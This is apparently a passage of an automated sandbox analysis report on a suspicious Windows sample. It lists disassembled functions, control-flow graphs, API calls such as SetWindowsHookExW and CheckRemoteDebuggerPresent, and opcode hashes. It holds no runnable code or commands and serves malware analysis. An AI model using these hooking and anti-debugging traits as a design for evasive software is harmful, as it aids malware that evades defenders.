                                                                                      • API ID: CriticalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2695349919-0
                                                                                      • Opcode ID: 03e94733f998c5de459134ee5834a568eef7438ccf075cbc2ed539e35651e03f
                                                                                      • Instruction ID: f183e8843141f9a25954faea1abf5e8b030c1c605972e1615ea911ca18bf9704
                                                                                      • Opcode Fuzzy Hash: 03e94733f998c5de459134ee5834a568eef7438ccf075cbc2ed539e35651e03f
                                                                                      • Instruction Fuzzy Hash: 2C41357190CA988FEB19DB6CC8496B97BE0FF96311F14407ED0CAC3692DB74A846C791
                                                                                      Function 00007FFAACB39D98 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 199 7ffaacb39d98-7ffaacb39d9f 200 7ffaacb39daa-7ffaacb39e1d 199->200 201 7ffaacb39da1-7ffaacb39da9 199->201 204 7ffaacb39e23-7ffaacb39e30 200->204 205 7ffaacb39ea9-7ffaacb39ead 200->205 201->200 206 7ffaacb39e32-7ffaacb39e6f SetWindowsHookExW 204->206 205->206 207 7ffaacb39e71 206->207 208 7ffaacb39e77-7ffaacb39ea8 206->208 207->208
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: 2e13cd4d574cbba4c1e03df4fc6976e49c9ea29aa35bf917abfda691c90a671f
                                                                                      • Instruction ID: 07ee1f41dbf762679c35adb813440ec9a394f23c9015ab9098d929ea9e1b47f4
                                                                                      • Opcode Fuzzy Hash: 2e13cd4d574cbba4c1e03df4fc6976e49c9ea29aa35bf917abfda691c90a671f
                                                                                      • Instruction Fuzzy Hash: D331E770A0CA588FEB48DB68D8466F97BE1EF5A321F00427ED04DC3292CA65A816C7C1
                                                                                      Function 00007FFAACB37A51 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 212 7ffaacb37a51-7ffaacb37b0d CheckRemoteDebuggerPresent 216 7ffaacb37b0f 212->216 217 7ffaacb37b15-7ffaacb37b58 212->217 216->217
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: e8877c364f8ac600c607c6b6b4c4959773defff007d818a448a6d27da78c29b9
                                                                                      • Instruction ID: 576f5441e3214d23389c320764a96deca07c91c271cf9e61c3d71dcd4023ff2d
                                                                                      • Opcode Fuzzy Hash: e8877c364f8ac600c607c6b6b4c4959773defff007d818a448a6d27da78c29b9
                                                                                      • Instruction Fuzzy Hash: 8131017190861C8FCB58DF58C88ABE97BE0FF65321F05426AD489D7252DB34A846CB91

                                                                                      Execution Graph

                                                                                      Execution Coverage:17.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:5%
                                                                                      Total number of Nodes:80
                                                                                      Total number of Limit Nodes:5
                                                                                      execution_graph 1251 cfa7c6 1252 cfa7f2 CloseHandle 1251->1252 1253 cfa831 1251->1253 1254 cfa800 1252->1254 1253->1252 1255 cfb286 1256 cfb2e8 1255->1256 1257 cfb2b2 GetSystemInfo 1255->1257 1256->1257 1258 cfb2c0 1257->1258 1333 cfa784 1334 cfa7c6 CloseHandle 1333->1334 1336 cfa800 1334->1336 1337 cfa900 1338 cfa932 SetFilePointer 1337->1338 1340 cfa996 1338->1340 1305 cfa5dc 1306 cfa5fe GetLongPathNameW 1305->1306 1308 cfa63e 1306->1308 1275 cfa2da 1276 cfa32f 1275->1276 1277 cfa306 SetErrorMode 1275->1277 1276->1277 1278 cfa31b 1277->1278 1283 cfac96 1284 cface6 CreatePipe 1283->1284 1285 cfacee 1284->1285 1309 cfac54 1310 cfac96 CreatePipe 1309->1310 1312 cfacee 1310->1312 1297 cfaa12 1299 cfaa47 WriteFile 1297->1299 1300 cfaa79 1299->1300 1247 cfa6ae 1248 cfa6e6 CreateFileW 1247->1248 1250 cfa735 1248->1250 1341 cfa2ae 1342 cfa2b2 SetErrorMode 1341->1342 1344 cfa31b 1342->1344 1313 cfb264 1314 cfb286 GetSystemInfo 1313->1314 1316 cfb2c0 1314->1316 1317 cfa9e3 1318 cfaa12 WriteFile 1317->1318 1320 cfaa79 1318->1320 1263 cfb062 1264 cfb08e FindClose 1263->1264 1265 cfb0c0 1263->1265 1266 cfb0a3 1264->1266 1265->1264 1345 cfa120 1346 cfa172 FindNextFileW 1345->1346 1348 cfa1ca 1346->1348 1349 cfa83f 1351 cfa872 GetFileType 1349->1351 1352 cfa8d4 1351->1352 1267 cfa5fe 1268 cfa668 1267->1268 1269 cfa630 GetLongPathNameW 1267->1269 1268->1269 1270 cfa63e 1269->1270 1353 cfaabb 1354 cfaaf6 CreateDirectoryW 1353->1354 1356 cfab43 1354->1356 1357 cfb03b 1358 cfb062 FindClose 1357->1358 1360 cfb0a3 1358->1360 1279 cfaaf6 1281 cfab1c CreateDirectoryW 1279->1281 1282 cfab43 1281->1282 1325 cfa676 1328 cfa6ae CreateFileW 1325->1328 1327 cfa735 1328->1327 1361 cfadb4 1362 cfadda DuplicateHandle 1361->1362 1364 cfae5f 1362->1364 1294 cfa172 1295 cfa1c2 FindNextFileW 1294->1295 1296 cfa1ca 1295->1296 1301 cfa932 1303 cfa967 SetFilePointer 1301->1303 1304 cfa996 1303->1304 1329 cfa370 1330 cfa392 RegQueryValueExW 1329->1330 1332 cfa41b 1330->1332

                                                                                      Callgraph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      • Opacity -> Relevance
                                                                                      • Disassembly available
                                                                                      callgraph 0 Function_00E00DE0 23 Function_00E00BA0 0->23 1 Function_00CFB0CE 2 Function_00CFA7C6 3 Function_00CF26C5 4 Function_00CFA5DC 5 Function_00CFADDA 6 Function_00CFA2DA 7 Function_00CF25D8 8 Function_00CFAFD2 9 Function_00CFB1D1 10 Function_00CF20D0 11 Function_00E002C0 21 Function_00E105DF 11->21 50 Function_00E00799 11->50 104 Function_00E10606 11->104 12 Function_00CF26E9 13 Function_00CFA9E3 14 Function_00E105CF 15 Function_00CFA5FE 16 Function_00E00DD1 16->23 17 Function_00CFAAF6 18 Function_00CFB2F6 19 Function_00CF23F4 20 Function_00CFA1F4 22 Function_00CF21F0 24 Function_00E00DA2 24->23 25 Function_00CFAB8A 26 Function_00E00CA8 27 Function_00CFB286 28 Function_00CFA486 29 Function_00CFA784 30 Function_00CF2583 31 Function_00E002B0 31->21 31->50 31->104 32 Function_00E005B1 33 Function_00E107B2 34 Function_00CFA09A 35 Function_00E107B6 36 Function_00CF2098 37 Function_00CFAC96 38 Function_00CF2194 39 Function_00CF2494 40 Function_00CFA392 41 Function_00E105BF 42 Function_00CFAB90 43 Function_00CFA6AE 44 Function_00CFA2AE 45 Function_00E10784 46 Function_00E00B8F 47 Function_00CF23BC 48 Function_00CFAABB 49 Function_00CFABB6 50->21 50->23 50->26 51 Function_00E00C99 50->51 56 Function_00E00C60 50->56 75 Function_00E00C50 50->75 50->104 52 Function_00E1009B 53 Function_00CFAEB5 54 Function_00CFADB4 55 Function_00CFAFB0 57 Function_00CFB54E 58 Function_00CFB44E 59 Function_00CF2B44 60 Function_00CF2044 61 Function_00E1066A 62 Function_00CFA45C 63 Function_00CF2458 64 Function_00CFAC54 65 Function_00E1067F 66 Function_00E00748 67 Function_00E10648 67->61 68 Function_00CFA566 69 Function_00CF2264 70 Function_00CF2364 71 Function_00CFB264 72 Function_00CFAF62 73 Function_00CFB062 74 Function_00CFA462 76 Function_00CF247C 77 Function_00CF267C 78 Function_00CFA078 79 Function_00CFA676 80 Function_00CFA172 81 Function_00CFA872 82 Function_00E1005F 83 Function_00CFA370 84 Function_00CFA50F 85 Function_00CFB20D 86 Function_00CF2005 87 Function_00CF2505 88 Function_00CFA005 89 Function_00CFB102 90 Function_00CFB401 91 Function_00E1082E 92 Function_00CFA900 93 Function_00CFAD1C 94 Function_00CFAF1C 95 Function_00CF2717 96 Function_00E00739 97 Function_00CFAA12 98 Function_00E00C3D 99 Function_00CF2310 100 Function_00E10001 101 Function_00CFA02E 102 Function_00CFAF2C 103 Function_00E10807 105 Function_00E00E08 105->23 106 Function_00CFB326 107 Function_00CFAC26 108 Function_00CFAF26 109 Function_00E1000C 110 Function_00CF2621 111 Function_00CFA120 112 Function_00CFB520 113 Function_00CFA83F 114 Function_00CFAD3E 115 Function_00CFA33D 116 Function_00CF213C 117 Function_00CF273B 118 Function_00E00014 119 Function_00CFB03B 120 Function_00CFA23A 121 Function_00E00E18 121->23 122 Function_00E10718 123 Function_00CFA932 124 Function_00CF2430

                                                                                      Executed Functions

                                                                                      Function 00CFB286 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNELBASE(?), ref: 00CFB2B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 31276548-0
                                                                                      • Opcode ID: fc8bcd821ed1bc28c904f5961f9db40d2e873746afd6a31e7fb64c46d3bc11a2
                                                                                      • Instruction ID: abfcd8a1fbab7e8bbbbf1fd893b5d50642285a70359e32e552e8a8342fb97e6d
                                                                                      • Opcode Fuzzy Hash: fc8bcd821ed1bc28c904f5961f9db40d2e873746afd6a31e7fb64c46d3bc11a2
                                                                                      • Instruction Fuzzy Hash: F801A2714042448FDB50DF56D984769FBE4EF44320F18C4AADD498F642D379E908DB62
                                                                                      Function 00E00799 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 e00799-e007c7 2 e00b77 0->2 3 e007cd-e007da 0->3 5 e00b83-e00b8d 2->5 93 e007dc call e00ba0 3->93 94 e007dc call e10606 3->94 95 e007dc call e105df 3->95 6 e007e2 96 e007e2 call e00c60 6->96 97 e007e2 call e00c50 6->97 7 e007e8-e00802 call e00ba0 10 e00810 7->10 11 e00804-e0080e 7->11 12 e00815-e00817 10->12 11->12 13 e0089b-e00940 12->13 14 e0081d-e0088e 12->14 31 e00948-e009a9 call e00ba0 * 2 13->31 99 e00890 call e10606 14->99 100 e00890 call e00ca8 14->100 101 e00890 call e00c99 14->101 102 e00890 call e105df 14->102 29 e00896 29->31 41 e00b63-e00b67 31->41 42 e009af 31->42 41->5 44 e00b69-e00b75 41->44 43 e009b2-e009da 42->43 49 e009e0-e009e4 43->49 50 e00b51-e00b5d 43->50 44->5 51 e00b39-e00b48 call e00ba0 49->51 52 e009ea-e009fd 49->52 50->41 50->43 58 e00b4e 51->58 53 e00a70-e00a74 52->53 54 e009ff 52->54 57 e00a7a-e00aa7 53->57 53->58 56 e00a02-e00a24 54->56 63 e00a26 56->63 64 e00a2b-e00a5e 56->64 69 e00aa9 57->69 70 e00aae-e00ad5 57->70 58->50 63->64 75 e00a60 64->75 76 e00a67-e00a6e 64->76 69->70 78 e00ad7-e00aed 70->78 79 e00b1d-e00b25 70->79 75->76 76->53 76->56 83 e00af4-e00b1b 78->83 84 e00aef 78->84 79->58 83->79 88 e00b27-e00b37 83->88 84->83 88->58 93->6 94->6 95->6 96->7 97->7 99->29 100->29 101->29 102->29
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :@*l$:@*l$\OQl
                                                                                      • API String ID: 0-1411936664
                                                                                      • Opcode ID: d92342a1690af54f6d6e0b631118ca3d5acbca2d42e9db6f02e3a171fb9aea17
                                                                                      • Instruction ID: 871b1af6ccffa8eed960de997655b2d9c1dd92e09bd1940826b7a49387787dad
                                                                                      • Opcode Fuzzy Hash: d92342a1690af54f6d6e0b631118ca3d5acbca2d42e9db6f02e3a171fb9aea17
                                                                                      • Instruction Fuzzy Hash: 1DA17D30B012048BDB19EB74D858BBE77B6EB8830CF248429D906A77D4DF749C46CBA1
                                                                                      Function 00E00C99 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 103 e00c99-e00ce1 107 e00ce3-e00d0c 103->107 108 e00d0e-e00d16 103->108 111 e00d1e-e00d92 107->111 108->111 122 e00d99-e00dcb 111->122
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `l$`l
                                                                                      • API String ID: 0-2458287728
                                                                                      • Opcode ID: 52a0f52e98e6ee2dbff3562803b9e5209742cf0b514b6f1eb814f93f0f7274b2
                                                                                      • Instruction ID: 57e4e30a5213792f603a3ac9f3635737eb7eb5b3b948254e51292a62de68c290
                                                                                      • Opcode Fuzzy Hash: 52a0f52e98e6ee2dbff3562803b9e5209742cf0b514b6f1eb814f93f0f7274b2
                                                                                      • Instruction Fuzzy Hash: DD2104307007848BC752EB398441BAE7AD69FC6208F88482CD485DB7C1DF76E90687E2
                                                                                      Function 00E00CA8 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 125 e00ca8-e00ce1 128 e00ce3-e00d0c 125->128 129 e00d0e-e00d16 125->129 132 e00d1e-e00d92 128->132 129->132 143 e00d99-e00dcb 132->143
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `l$`l
                                                                                      • API String ID: 0-2458287728
                                                                                      • Opcode ID: 553a221341c21dabae740b8ab6c693f5249364ea7e0f6dc8ded8d95870a41e1e
                                                                                      • Instruction ID: 25e833dc93be7166ce5c1aa002c89c2bcc2608afe56768ee60006f2658b22bd8
                                                                                      • Opcode Fuzzy Hash: 553a221341c21dabae740b8ab6c693f5249364ea7e0f6dc8ded8d95870a41e1e
                                                                                      • Instruction Fuzzy Hash: 0221F3307007448BC754EB35C4417AEB7E69BC4308B94882CD046EB7C0DF75E9068BE2
                                                                                      Function 00CFA676 Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 146 cfa676-cfa706 150 cfa70b-cfa717 146->150 151 cfa708 146->151 152 cfa71c-cfa725 150->152 153 cfa719 150->153 151->150 154 cfa727-cfa74b CreateFileW 152->154 155 cfa776-cfa77b 152->155 153->152 158 cfa77d-cfa782 154->158 159 cfa74d-cfa773 154->159 155->154 158->159
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: fda69c9686ebf3102e6d0a900956216c22eb978dedee032c7e3d005d8daf41e7
                                                                                      • Instruction ID: 6bdab5743f34b7b86ea09994844cd3d4c0eec9d6f4ee8f42f24943993897397a
                                                                                      • Opcode Fuzzy Hash: fda69c9686ebf3102e6d0a900956216c22eb978dedee032c7e3d005d8daf41e7
                                                                                      • Instruction Fuzzy Hash: 323190B15093846FE712CB25DD44FA2BFF8EF06314F08849EE9858B652D375A909CB72
                                                                                      Function 00CFB2F6 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 162 cfb2f6-cfb39b 167 cfb39d-cfb3a5 DuplicateHandle 162->167 168 cfb3f3-cfb3f8 162->168 169 cfb3ab-cfb3bd 167->169 168->167 171 cfb3bf-cfb3f0 169->171 172 cfb3fa-cfb3ff 169->172 172->171
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFB3A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 8c03fb29f9cc19996b462254559d5df2ed18404a8eaf50c2f5be8087dd75a643
                                                                                      • Instruction ID: 60311c09a109bd85d4366de9967ee8632d259a5d328aaf6553c88d7deefcfa1d
                                                                                      • Opcode Fuzzy Hash: 8c03fb29f9cc19996b462254559d5df2ed18404a8eaf50c2f5be8087dd75a643
                                                                                      • Instruction Fuzzy Hash: 9B31A171405344AFE7228B61DC44FA6BFBCEF06220F04889AE985CB562D374A9098B71
                                                                                      Function 00CFADB4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 176 cfadb4-cfae4f 181 cfaea7-cfaeac 176->181 182 cfae51-cfae59 DuplicateHandle 176->182 181->182 183 cfae5f-cfae71 182->183 185 cfaeae-cfaeb3 183->185 186 cfae73-cfaea4 183->186 185->186
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFAE57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: b487d95eccddf62fc9e39dc71ab391711326406ee47c12d1c08ae5c445604eb2
                                                                                      • Instruction ID: b84bb47a5ffccab6ece57b68c4d2090527c449d810e98ddc3fd4f1c0cf5ca12b
                                                                                      • Opcode Fuzzy Hash: b487d95eccddf62fc9e39dc71ab391711326406ee47c12d1c08ae5c445604eb2
                                                                                      • Instruction Fuzzy Hash: C831A171405344AFEB228B61DC44FA7BFBCEF45224F0488AEF985DB552D224A919CB61
                                                                                      Function 00CFA120 Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 190 cfa120-cfa1f3 FindNextFileW
                                                                                      APIs
                                                                                      • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00CFA1C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindNext
                                                                                      • String ID:
                                                                                      • API String ID: 2029273394-0
                                                                                      • Opcode ID: 00ba911f0243bb0efac80a72c828395ef5dd6ced685fca5d59e4d5fbb66d3260
                                                                                      • Instruction ID: 8fd8d89686a9790dee0b9dafd5ff3f5b6f91700973947f2fbdbec7ced4e1b860
                                                                                      • Opcode Fuzzy Hash: 00ba911f0243bb0efac80a72c828395ef5dd6ced685fca5d59e4d5fbb66d3260
                                                                                      • Instruction Fuzzy Hash: 4E21B27140D3C06FD3128B258C51BA6BFB8EF47620F1985DBE884DF693D225A919C7A2
                                                                                      Function 00CFADDA Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 212 cfadda-cfae4f 216 cfaea7-cfaeac 212->216 217 cfae51-cfae59 DuplicateHandle 212->217 216->217 218 cfae5f-cfae71 217->218 220 cfaeae-cfaeb3 218->220 221 cfae73-cfaea4 218->221 220->221
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFAE57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: f7e91a034c40b2337800009f336dfd9b61bdbca4ae85965020318cc41e681e83
                                                                                      • Instruction ID: f80cbeb8d06ce1b9f4152ee475a2fb3ffbca5003c970403db795b5a7757b95e2
                                                                                      • Opcode Fuzzy Hash: f7e91a034c40b2337800009f336dfd9b61bdbca4ae85965020318cc41e681e83
                                                                                      • Instruction Fuzzy Hash: CD21A172500208AFEB219F51DD44FAAFBECEF04314F14886AE9459AA51D374E5189BA2
                                                                                      Function 00CFA370 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 195 cfa370-cfa3cf 198 cfa3d4-cfa3dd 195->198 199 cfa3d1 195->199 200 cfa3df 198->200 201 cfa3e2-cfa3e8 198->201 199->198 200->201 202 cfa3ed-cfa404 201->202 203 cfa3ea 201->203 205 cfa43b-cfa440 202->205 206 cfa406-cfa419 RegQueryValueExW 202->206 203->202 205->206 207 cfa41b-cfa438 206->207 208 cfa442-cfa447 206->208 208->207
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA40C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: 72fc411cdef11ff25bd48fca1586fc3098f80a5e55bc359b1040bc2a112515c4
                                                                                      • Instruction ID: 1530a56411767a3cc740e11160093835adce44776961c56d596cbf388134a60a
                                                                                      • Opcode Fuzzy Hash: 72fc411cdef11ff25bd48fca1586fc3098f80a5e55bc359b1040bc2a112515c4
                                                                                      • Instruction Fuzzy Hash: AF217CB5505344AFD721CB11DC84FA2FBF8AF05610F18849AE9899B2A2D364E908CB62
                                                                                      Function 00CFB326 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 225 cfb326-cfb39b 229 cfb39d-cfb3a5 DuplicateHandle 225->229 230 cfb3f3-cfb3f8 225->230 231 cfb3ab-cfb3bd 229->231 230->229 233 cfb3bf-cfb3f0 231->233 234 cfb3fa-cfb3ff 231->234 234->233
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFB3A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: d78949287329bf415c6aebec0bb486b7b9522a85453a73132b82aa98ceef43f2
                                                                                      • Instruction ID: 27aee622da4ac38b0a87bcf26b328cc3a790a7507767ae7a9d9da6aad4fcd3d0
                                                                                      • Opcode Fuzzy Hash: d78949287329bf415c6aebec0bb486b7b9522a85453a73132b82aa98ceef43f2
                                                                                      • Instruction Fuzzy Hash: 0D21B272500204AFEB21DF55DC44FABBBFCEF04314F14886EE9459B651D774E9088B61
                                                                                      Function 00CFA900 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 238 cfa900-cfa986 242 cfa9ca-cfa9cf 238->242 243 cfa988-cfa9a8 SetFilePointer 238->243 242->243 246 cfa9aa-cfa9c7 243->246 247 cfa9d1-cfa9d6 243->247 247->246
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFA98E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 37558dc487155c753bc5cf285a36bac4fc7ffbd0346144996e28875c940d09da
                                                                                      • Instruction ID: 3d037ac9eb6095c523ca57d0448544d8f4197da3f922b7af39e8a1ee8ee0f5e1
                                                                                      • Opcode Fuzzy Hash: 37558dc487155c753bc5cf285a36bac4fc7ffbd0346144996e28875c940d09da
                                                                                      • Instruction Fuzzy Hash: 9121C1714093846FE7228B10DC44FA2BFB8EF46724F1984EAE9849B552C274A909CB72
                                                                                      Function 00CFA9E3 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 250 cfa9e3-cfaa69 254 cfaaad-cfaab2 250->254 255 cfaa6b-cfaa8b WriteFile 250->255 254->255 258 cfaa8d-cfaaaa 255->258 259 cfaab4-cfaab9 255->259 259->258
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,00000E24,A9E11F9B,00000000,00000000,00000000,00000000), ref: 00CFAA71
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: fb1d9d941da6d73dd9f9103c1e3b36ea8f32da0c8efde52b833d52f16494c458
                                                                                      • Instruction ID: 470fb859d035fce272934785a8d7a40f1b42652612e61b1d8bc5579b1fbd8073
                                                                                      • Opcode Fuzzy Hash: fb1d9d941da6d73dd9f9103c1e3b36ea8f32da0c8efde52b833d52f16494c458
                                                                                      • Instruction Fuzzy Hash: E621A171409384AFDB22CF51DD44FA6FFB8EF46310F18849AE9849B152C375A508CB62
                                                                                      Function 00CFA6AE Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
